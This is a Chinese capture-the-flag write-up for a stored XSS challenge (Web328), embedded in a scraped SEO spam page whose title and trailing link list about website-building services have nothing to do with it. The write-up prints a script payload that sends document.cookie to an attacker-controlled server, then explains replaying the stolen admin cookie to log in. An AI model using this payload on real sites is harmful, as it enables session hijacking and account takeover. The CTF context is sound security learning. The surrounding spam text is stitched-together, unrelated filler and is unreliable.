当前位置: 首页 > news >正文

黄村网站建设价格网站管理系统

黄村网站建设价格,网站管理系统,可以在哪些网站 app做推广的,肥城网站制作Web328 简单阅读一下页面。 是一个登录系统,存在一个用户管理数据库。 那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。 思路 我们向数据库中写入盗取管理员…

Web328

简单阅读一下页面。
是一个登录系统,存在一个用户管理数据库。
那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。

在这里插入图片描述

在这里插入图片描述

思路

我们向数据库中写入盗取管理员Cookie的恶意代码,然后利用管理员Cookie跳过账号密码验证,直接登录管理员界面即可。

在注册页面,把script、body、svg、img标签都试一下,看看哪个能成功获取到Cookie。
最后使用script标签成功了。
账号和密码都输入下面的payload:

<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

然后在登录界面登录一下,就会发现自己服务器获取到了管理员的cookie

这时候我们访问用户管理界面并抓包,将自己的Cookie修改为管理员的Cookie,页面会显示 欢迎你,admin
但是此时下面的用户名和密码还没有出现。我们需要继续抓包,发现又会抓到一个关于下面内容的包,将这个包的Cookie也改为管理员Cookie,我们才能成功获取flag。
在这里插入图片描述得到flag。

这里的管理员cookie更换的频率挺快的,能不能登录有点看运气,不知道有没有更稳定的方法/

http://www.tj-hxxt.cn/news/33131.html

相关文章:

  • 长沙网站开发长沙网站建设国外网站怎么推广
  • 哪个建设网站好站长工具百度百科
  • 文化共享工程网站建设情况如何自己创造一个网站平台
  • 深圳广告策划公司宁波seo外包服务平台
  • 做网站怎么推广百度推广上班怎么样
  • 到国外网站上做兼职翻译网址大全浏览器下载
  • 做外贸需要注册哪些b2b网站google登录入口
  • 怎样做自己的销售网站营销活动推广方案
  • 做代理网站用什么软件可以进入任何网站的浏览器
  • wordpress边栏windows优化大师是哪个公司的
  • 完成公司网站建设西安seo优化工作室
  • wordpress 用户权限 插件seo排名分析
  • 贵阳做网站的大公司怎么做市场推广
  • 深圳做棋牌网站建设多少钱公众号软文推广
  • 学生创业做网站制作设计百度网页版进入
  • 自己可以做视频网站吗中国疫情最新数据
  • 徐州专业做网站app引流推广软件
  • 大连网站建设信息店铺数据分析主要分析什么
  • 昆明定制网站建设毛戈平化妆培训学校官网
  • 阿里云服务器发布网站头条广告入口
  • 网站建设专员求职简历西安seo代理计费
  • 金融 网站建设大连做优化网站哪家好
  • 湘潭网站建设 磐石网络优质深圳seo优化seo优化
  • 建设一个网站的操作流程300字长沙百家号seo
  • wordpress错误信息流广告优化师培训
  • 加强政府网站建设和管理网站优化提升排名
  • 建设购物网站流程网络营销计划的七个步骤
  • 网站区域名怎么注册怎样看网页的友情链接
  • 西安制作网站的电话北京自动网络营销推广
  • 鄱阳有做百度网站的网站seo优化排名